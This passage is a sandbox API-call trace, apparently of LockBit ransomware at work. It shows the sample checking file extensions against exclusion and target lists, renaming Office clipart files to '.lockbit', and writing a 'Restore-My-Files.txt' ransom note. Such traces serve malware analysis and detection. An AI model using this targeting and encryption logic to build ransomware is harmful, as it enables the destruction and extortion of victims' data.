lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00768_.WMF") returned -1 [0175.837] lstrcmpiW (lpString1="ntldr", lpString2="SO00768_.WMF") returned -1 [0175.837] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00768_.WMF") returned -1 [0175.837] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00768_.WMF") returned -1 [0175.837] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00768_.WMF") returned -1 [0175.837] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00768_.WMF") returned 1 [0175.837] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00768_.WMF") returned -1 [0175.837] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.837] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00768_.WMF") returned=".WMF" [0175.837] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.837] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.837] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.838] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.839] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00768_.WMF.lockbit") returned 72 [0175.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00768_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00768_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0175.840] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.840] malloc (_Size=0x40068) returned 0x3ef0008 [0175.840] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=21562) returned 1 [0175.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0175.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0175.841] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0175.846] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00768_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00768_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.846] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.846] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.848] free (_Block=0x1fa2ed8) [0175.848] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00768_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.848] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.848] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.848] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1db71a00, ftCreationTime.dwHighDateTime=0x1bd4b39, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1db71a00, ftLastWriteTime.dwHighDateTime=0x1bd4b39, nFileSizeHigh=0x0, nFileSizeLow=0x16ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00783_.WMF", cAlternateFileName="")) returned 1 [0175.848] lstrcmpiW (lpString1=".", lpString2="SO00783_.WMF") returned -1 [0175.848] lstrcmpiW (lpString1="..", lpString2="SO00783_.WMF") returned -1 [0175.848] PathFindExtensionW (pszPath="SO00783_.WMF") returned=".WMF" [0175.848] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.848] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.848] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.848] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.848] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.849] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.850] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.850] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00783_.WMF") returned -1 [0175.851] lstrcmpiW (lpString1="ntldr", lpString2="SO00783_.WMF") returned -1 [0175.851] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00783_.WMF") returned -1 [0175.851] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00783_.WMF") returned -1 [0175.851] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00783_.WMF") returned -1 [0175.851] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00783_.WMF") returned 1 [0175.851] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00783_.WMF") returned -1 [0175.851] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.851] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00783_.WMF") returned=".WMF" [0175.851] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.851] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.851] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.852] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.853] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.853] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.853] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.853] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.853] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.853] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00783_.WMF.lockbit") returned 72 [0175.853] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00783_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00783_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.857] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.857] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.857] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5870) returned 1 [0175.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.859] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.864] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00783_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00783_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.864] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.864] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.865] free (_Block=0x1fa2ed8) [0175.865] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00783_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.865] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.865] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.866] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x230f6700, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x230f6700, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0x41c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00820_.WMF", cAlternateFileName="")) returned 1 [0175.866] lstrcmpiW (lpString1=".", lpString2="SO00820_.WMF") returned -1 [0175.866] lstrcmpiW (lpString1="..", lpString2="SO00820_.WMF") returned -1 [0175.866] PathFindExtensionW (pszPath="SO00820_.WMF") returned=".WMF" [0175.866] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.866] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.867] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.867] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00820_.WMF") returned -1 [0175.868] lstrcmpiW (lpString1="ntldr", lpString2="SO00820_.WMF") returned -1 [0175.868] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00820_.WMF") returned -1 [0175.868] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00820_.WMF") returned -1 [0175.868] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00820_.WMF") returned -1 [0175.868] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00820_.WMF") returned 1 [0175.868] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00820_.WMF") returned -1 [0175.868] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.868] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00820_.WMF") returned=".WMF" [0175.868] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.868] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.868] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.869] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.870] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.870] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.870] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00820_.WMF.lockbit") returned 72 [0175.870] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00820_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00820_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0175.871] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.871] malloc (_Size=0x40068) returned 0x3d70450 [0175.871] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=16834) returned 1 [0175.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0175.872] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0175.872] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0175.877] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00820_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00820_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.877] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.877] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.879] free (_Block=0x1fa2ed8) [0175.879] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00820_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.879] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.879] CreateFileW 